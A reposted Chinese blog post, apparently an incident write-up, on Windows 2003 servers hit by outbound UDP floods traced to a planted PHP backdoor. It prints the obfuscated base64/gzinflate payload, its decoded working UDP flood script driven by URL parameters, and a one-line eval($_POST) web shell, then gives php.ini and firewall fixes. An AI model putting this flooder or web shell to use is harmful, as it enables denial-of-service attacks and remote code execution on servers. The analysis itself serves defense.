win2003遭受udp攻击导致带宽占用很大
2019独角兽企业重金招聘Python工程师标准>>>
朋友国外的机器带宽突然跑的很大,网站不多,后来说是把对外的udp端口给封了就好了.后来在国内一个放企业站上面也出现过如此的情况.
后来发现在一个网站里面发现一个加密的.解密后看到很熟悉的 udp 莫非有关系?.果然 也有朋友遇到这样的情况,看来封禁对外udp是很必要的,
关于近期一些服务器遭受UDP攻击的说明
近来我有一两台服务器显示经常受到udp攻击
导致服务器带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带宽就为0了,其实不然,都是部分用户被入侵导致的
下面我想说一下被入侵的原理
用户程序中的一个php页面的原代码:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
经过N次解密后的代码:
<?php
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand <br><br>\";
$max_time = $time+$exec_time; for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
<?php eval($_POST[ddos])?>
工作原理:
先把你代码放到一个正常的网页中.
通过url传递IP和端口以udp的方式打开.传递文件到服务器写出.
这样服务器就中招了.
也就是服务器显示udp攻击,带宽占用非常之严重,基本是100%,一般徘徊在97%-99%之间
解决方案:
在php.ini中限制php用网络。
在php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
然后重启IIS
我没关这个函数,有的程序需要貌似,直接把udp出站端口给封了.
转载于:https://my.oschina.net/softsky/blog/160583
win2003遭受udp攻击导致带宽占用很大相关推荐
- XSSFWorkbook导致CPU占用很高
XSSFWorkbook导致CPU占用很高 将微信支付的账单同步至云存储 业务需求 科普 解决方案 将微信支付的账单同步至云存储 业务需求 https://pay.weixin.qq.com/wiki ...
- 解决MongoDB 日志文件过大,清理后还占用很大磁盘空间的问题
解决MongoDB 日志文件过大,清理后还占用很大磁盘空间的问题 参考文章: (1)解决MongoDB 日志文件过大,清理后还占用很大磁盘空间的问题 (2)https://www.cnblogs.co ...
- Vue app.js文件过大,带宽占用过大,优化方案(持续优化)
Vue app.js文件过大,带宽占用过大,优化方案 前言 最近我的网站在使用的过程中发现加载缓慢问题,在没有缓存的情况下页面打开速度需要五秒,这对于用户体验来说是不友好的.通过查找网上的方案 我实验 ...
- linux 虚拟机大量udp请求失败_linux遭受UDP攻击解决办法
前几天朋友的网站流量很大,导致无法访问.去IDC查看,服务器已经DOWN掉了.重启后使用bandwidth查看近来的流量状况,发现是由于UDP的流量达到峰值导致.系统为Centos 5.4 1.下载安 ...
- 计算机运行一会内存占用巨大,Win8电脑程序占用很大内存怎么办?
为电脑安装各种程序软件基本是每一个用户朋友必做的事情.两台原本一模一样的电脑在被分配给两个人一段时间之后,内部是绝对不会再一模一样的.因为人们喜欢安装的软件各不相同,喜欢用电脑做的事情也不会都一样.一 ...
- Excel表数据很少,内存占用很大
问题描述 一个Excel表中只有很少的数据,但是占用了很大的空间. 打开该Excel表发现,横向滚动轴或纵向滚动轴很长,但是没有数据(滚动轴能滚到的区域基本是这个sheet占用的区域) 通过Ctrl+ ...
- 数据明明不多,为什么表占用很大
1.根本原因:数据空洞 有些用了很久的表,尽管表中的记录并不多,但是文件却很大,这是什么原因呢?想要回答这个问题,就必须从表本身出发. 首先明确这是一张用了很久的表,如果不是只读表,那么理论上应该 ...
- 停电导致IIS问题,解决inetinfo的CPU占用很大
次意外停电后,无法运行IIS,刚开始就想之前一样,在安全模式下删除一些文件后重新装IIS,但是仍然是老样子,没办法,百度,Google无法找到解决方法. 准备重装时候做最后一次尝试,google搜索看 ...
- centos overlay 占用很大_盘锦技术好的升降货梯占用空间小
盘锦技术好的升降货梯占用空间小 zptus02v 盘锦技术好的升降货梯占用空间小 别逼我.二.电动缸的优点1.內置压力传感器,具备:4-20mA.0-10V输出功能,简单化设备机构.合理的节省设备成本 ...
最新文章
- java中的IO操作总结(一)
- Git CMD - push: Update remote refs along with associated objects
- mysql 唯一编号_Mysql表中唯一编号的分配机制
- redis的学习使用,第四章
- weblogic jprofile配置
- Spring 系列: Spring 框架
- 精通Android自定义View(十六)invalidate方法和requestLayout方法
- chrome浏览器session问题_Chrome浏览器的音频自动播放问题
- windows系统bat批处理 开机一键多个程序
- Orcad Library Builder使用教程以及安装踩坑记录
- Axure 安装教程
- c语言怎么写注释,C语言注释
- MIPI 系列之 D-PHY
- 笔记本光驱拆解——让整个世界变得安静
- egret_eui容器
- IAR for ARM系列教程(三)_菜单(Ⅰ)
- 遥感影像镶嵌拼接如何抠图及多源影像补图,如何进行区域替换去云异常区域
- 申请微信公众号的一些流程和注意
- 在电脑上登录两个微信
- 媒体类型@media